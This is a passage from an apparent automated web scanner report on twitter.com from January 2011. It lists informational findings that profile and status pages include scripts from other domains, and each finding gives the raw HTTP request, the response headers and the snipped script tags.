18.532. http://twitter.com/rickrussie/status/28548182396903424

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /rickrussie/status/28548182396903424

Issue detail

The response dynamically includes scripts from other domains; the cross-domain <script src> tags (ajax.googleapis.com, www.google.com and the twimg.com asset hosts) are visible in the response body below:

Request

GET /rickrussie/status/28548182396903424 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:32:22 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225142-40728-53822
ETag: "1cbee3680225988db4b7f069eac2d8f6"
Last-Modified: Fri, 28 Jan 2011 14:32:22 GMT
X-Runtime: 0.05601
Content-Type: text/html; charset=utf-8
Content-Length: 13808
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjtodHRwOi8vdHdpdHRlci5jb20vcmlja3J1c3Np%250AZS9zdGF0dXMvMjg1NDgxODIzOTY5MDM0MjQ6DGNzcmZfaWQiJTYyYzZiODVk%250AOTgyYmYyMGU3MTNiNWFlMjc0ZWQzNDdhOgdpZCIlMWM5NTM0ODFhNDJmZGU5%250AYzBjNzRhZWQ1NzkxZjJmNjQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6%250AOkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6D2NyZWF0ZWRfYXRsKwgz%250ATvDMLQE%253D--0a45b7902a1463fb664e60dc6835e5ac94eadf04; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.533. http://twitter.com/rickrussie/status/28548182396903424

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /rickrussie/status/28548182396903424

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /rickrussie/status/28548182396903424 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:15 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225014-32961-2577
ETag: "d46b26b9fe929840b674f147c0c89142"
Last-Modified: Fri, 28 Jan 2011 14:30:14 GMT
X-Runtime: 0.33011
Content-Type: text/html; charset=utf-8
Content-Length: 13807
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjtodHRwOi8vdHdpdHRlci5jb20vcmlja3J1c3Np%250AZS9zdGF0dXMvMjg1NDgxODIzOTY5MDM0MjQ6DGNzcmZfaWQiJTExNDc5ZjQ5%250AMmU2NjM5OTY2ODQ3NTY5ZjUxYWFlNjlmOg9jcmVhdGVkX2F0bCsIM07wzC0B%250AOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBjNzRhZWQ1NzkxZjJmNjQiCmZsYXNo%250ASUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1%250Ac2VkewA%253D--3d3bd2cab72fb51e93b5fed240300828d4f6844c; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.534. http://twitter.com/roctimo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /roctimo

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /roctimo HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:29:11 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224951-66281-31354
ETag: "9b0bbae04a168790126e11b0e79fd723"
Last-Modified: Fri, 28 Jan 2011 14:29:11 GMT
X-Runtime: 0.01993
Content-Type: text/html; charset=utf-8
Content-Length: 39421
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.535. http://twitter.com/roctimo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /roctimo

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /roctimo HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:09:42 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234582-62209-33110
ETag: "f9e22213823343f424bfc3ffbab40151"
Last-Modified: Fri, 28 Jan 2011 17:09:42 GMT
X-Runtime: 0.00906
Content-Type: text/html; charset=utf-8
Content-Length: 39288
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.536. http://twitter.com/roctimo/status/29669358812790784

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /roctimo/status/29669358812790784

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /roctimo/status/29669358812790784 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:29:12 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224952-82366-17089
ETag: "352d65a2c5752e7711f2873e5d5683dc"
Last-Modified: Fri, 28 Jan 2011 14:29:12 GMT
X-Runtime: 0.06219
Content-Type: text/html; charset=utf-8
Content-Length: 13608
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjhodHRwOi8vdHdpdHRlci5jb20vcm9jdGltby9z%250AdGF0dXMvMjk2NjkzNTg4MTI3OTA3ODQ6DGNzcmZfaWQiJWRhM2Y2NDUyMWY4%250AOWYxMzc2YjkzMTBhNGFhODkyOTBlOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBj%250ANzRhZWQ1NzkxZjJmNjQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZs%250AYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6D2NyZWF0ZWRfYXRsKwgzTvDM%250ALQE%253D--160e3ed7351db2a00b10df68a0ea6d7aa90fed75; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.537. http://twitter.com/roctimo/status/29669358812790784

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /roctimo/status/29669358812790784

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /roctimo/status/29669358812790784 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:09:46 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234586-65298-63351
ETag: "97120b0bbdca9f22be00678be4ac6985"
Last-Modified: Fri, 28 Jan 2011 17:09:46 GMT
X-Runtime: 0.04874
Content-Type: text/html; charset=utf-8
Content-Length: 13477
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIjhodHRwOi8vdHdpdHRlci5jb20vcm9jdGltby9z%250AdGF0dXMvMjk2NjkzNTg4MTI3OTA3ODQ6FWluX25ld191c2VyX2Zsb3cwOgxj%250Ac3JmX2lkIiVhYmM0NTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoMdHpf%250AbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBj%250ANzRhZWQ1NzkxZjJmNjQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZs%250AYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6D2NyZWF0ZWRfYXRsKwgzTvDM%250ALQE%253D--21b275406cd16839582a6a682f9edca9368c5a9d; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.538. http://twitter.com/rwaldron

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /rwaldron

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /rwaldron HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:12 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225072-30588-18769
ETag: "467245d95e03c9c4efa08a62b5cdfe26"
Last-Modified: Fri, 28 Jan 2011 14:31:12 GMT
X-Runtime: 0.01191
Content-Type: text/html; charset=utf-8
Content-Length: 52265
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.539. http://twitter.com/ryanolson

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /ryanolson

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ryanolson HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:39 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225039-20499-32646
ETag: "d2211433f4fd1a9e6d92a74f1cc30349"
Last-Modified: Fri, 28 Jan 2011 14:30:39 GMT
X-Runtime: 0.01104
Content-Type: text/html; charset=utf-8
Content-Length: 54351
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181158" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181158" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296181158" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296181158" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181158" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296181158" type="text/javascript"></script>
...[SNIP]...

18.540. http://twitter.com/scott_gonzalez

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /scott_gonzalez

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /scott_gonzalez HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
